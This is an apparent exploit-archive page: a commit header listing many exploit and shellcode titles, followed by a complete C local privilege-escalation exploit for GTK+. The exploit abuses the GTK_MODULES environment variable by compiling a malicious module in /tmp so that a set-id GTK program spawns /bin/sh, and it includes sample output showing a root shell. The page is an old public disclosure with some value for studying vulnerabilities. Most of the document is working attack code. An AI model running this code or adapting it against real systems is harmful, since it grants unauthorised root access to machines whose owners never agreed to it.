880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
103 lines
No EOL
4.8 KiB
C
103 lines
No EOL
4.8 KiB
C
// source: https://www.securityfocus.com/bid/2165/info
|
|
|
|
GTK+ is the Gimp Toolkit, freely available to the public and maintained by the GTK Development Team. A problem exists in the Gimp Toolkit that could allow a user elevated privileges.
|
|
|
|
The problem occurs in the ability to load modules with the GTK_MODULES environment variable. It is possible to specify a path to modules that may not be part of the GTK+ package using this environment variable. By doing so, a custom crafted module can be loaded by the toolkit. Once loaded by the toolkit, the module is executed. This issue makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code.
|
|
|
|
/* (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. this will give
|
|
you the euid/egid of a set*id program using gtk+. this exploit works via
|
|
the GTK_MODULES environmental variable, by tricking gtk to execute arbitrary
|
|
functions/commands with a bogus module. (using gtk_module_init())
|
|
|
|
example(./xgtk):
|
|
-------------------------------------------------------------------------------
|
|
# ls -l /usr/bin/X11/gtk_program
|
|
-rwxr-sr-x 1 root tty 437625 Oct 23 1999 /usr/bin/X11/gtk_program
|
|
# cc xgtk.c -o xgtk
|
|
# ./xgtk /usr/bin/X11/gtk_program :0.0
|
|
[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]
|
|
[ program: /usr/bin/X11/gtk_program(->/bin/sh), display: :0.0. ]
|
|
|
|
[*] making module for gtk+ to execute. (/tmp/gtkm.c)
|
|
[*] done, compiling module source file. (/tmp/gtkm.c->/tmp/gtkm.so)
|
|
[*] done, checking to see if the module comiled. (/tmp/gtkm.so)
|
|
[*] done, setting up the environment. (module&display)
|
|
[*] done, executing /usr/bin/X11/gtk_program, the module should load now.
|
|
[*] success, module loaded successfully.
|
|
[*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
|
|
[*] now executing: /bin/sh.
|
|
#
|
|
-------------------------------------------------------------------------------
|
|
|
|
note: this will require a valid display to exploit successfully. also, i'm
|
|
unsure of this for other gtk versions, i would just assume as much
|
|
that this applies to it.
|
|
*/
|
|
#define GCCPATH "/usr/bin/gcc" // path to gcc.
|
|
#define SRCFILE "/tmp/gtkm.c" // source to the fake module to load.
|
|
#define MODEXEC "/tmp/gtkm.so" // fake module to load.
|
|
#define DISPLAY ":0.0" // default display. (also argv option)
|
|
#define EXECUTE "/bin/sh" // execute this program.
|
|
#include <stdio.h>
|
|
#include <sys/stat.h>
|
|
int main(int argc,char **argv){
|
|
char cmd[256],syscmd[256],display[256];
|
|
struct stat mod1,mod2,mod3;
|
|
FILE *source;
|
|
fprintf(stderr,"[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]"
|
|
"\n");
|
|
if(argc>1){strncpy(cmd,argv[1],sizeof(cmd));}
|
|
else{
|
|
fprintf(stderr,"[!] syntax: %s </path/to/program> [display]\n",argv[0]);
|
|
exit(-1);
|
|
}
|
|
if(argc>2){strncpy(display,argv[2],sizeof(display));}
|
|
else{strncpy(display,DISPLAY,sizeof(display));}
|
|
if(stat(cmd,&mod1)){
|
|
fprintf(stderr,"[!] failed, %s doesn't seem to exist. (path needed)\n",cmd);
|
|
exit(-1);
|
|
}
|
|
if(stat(GCCPATH,&mod2)){
|
|
fprintf(stderr,"[!] failed, %s compiler doesn't seem to exist.\n",GCCPATH);
|
|
exit(-1);
|
|
}
|
|
fprintf(stderr,"[ program: %s(->%s), display: %s. ]\n\n",cmd,EXECUTE,display);
|
|
fprintf(stderr,"[*] making module for gtk+ to execute. (%s)\n",SRCFILE);
|
|
unlink(SRCFILE);
|
|
unlink(MODEXEC);
|
|
source=fopen(SRCFILE,"w");
|
|
fprintf(source,"#include <stdio.h>\n");
|
|
fprintf(source,"void gtk_module_init(){\n");
|
|
fprintf(source," unlink(\"%s\");\n",SRCFILE);
|
|
fprintf(source," unlink(\"%s\");\n",MODEXEC);
|
|
fprintf(source," fprintf(stderr,\"[*] success, module loaded successfully.\\n"
|
|
"\");\n");
|
|
fprintf(source," fprintf(stderr,\"[*] id stats: uid: %%d, euid: %%d, gid: %%d"
|
|
", egid: %%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n",EXECUTE);
|
|
fprintf(source," fprintf(stderr,\"[*] now executing: %s.\\n\");\n",EXECUTE);
|
|
fprintf(source," execl(\"%s\",\"%s\",0);\n",EXECUTE,EXECUTE);
|
|
fprintf(source,"}\n");
|
|
fclose(source);
|
|
fprintf(stderr,"[*] done, compiling module source file. (%s->%s)\n",SRCFILE,
|
|
MODEXEC);
|
|
snprintf(syscmd,sizeof(syscmd),"%s -shared -o %s %s 1>/dev/null 2>&1",GCCPATH,
|
|
MODEXEC,SRCFILE);
|
|
system(syscmd);
|
|
fprintf(stderr,"[*] done, checking to see if the module comiled. (%s)\n",
|
|
MODEXEC);
|
|
if(stat(MODEXEC,&mod3)){
|
|
fprintf(stderr,"[!] failed, %s was not compiled properly. (gcc failed)\n",
|
|
MODEXEC);
|
|
exit(-1);
|
|
}
|
|
fprintf(stderr,"[*] done, setting up the environment. (module&display)\n");
|
|
setenv("GTK_MODULES",MODEXEC,1);
|
|
setenv("DISPLAY",display,1);
|
|
fprintf(stderr,"[*] done, executing %s, the module should load now.\n",cmd);
|
|
if(execl(cmd,cmd,0)){
|
|
fprintf(stderr,"[!] failed, %s did not execute properly.\n",cmd);
|
|
unlink(SRCFILE);
|
|
unlink(MODEXEC);
|
|
exit(-1);
|
|
}
|
|
} |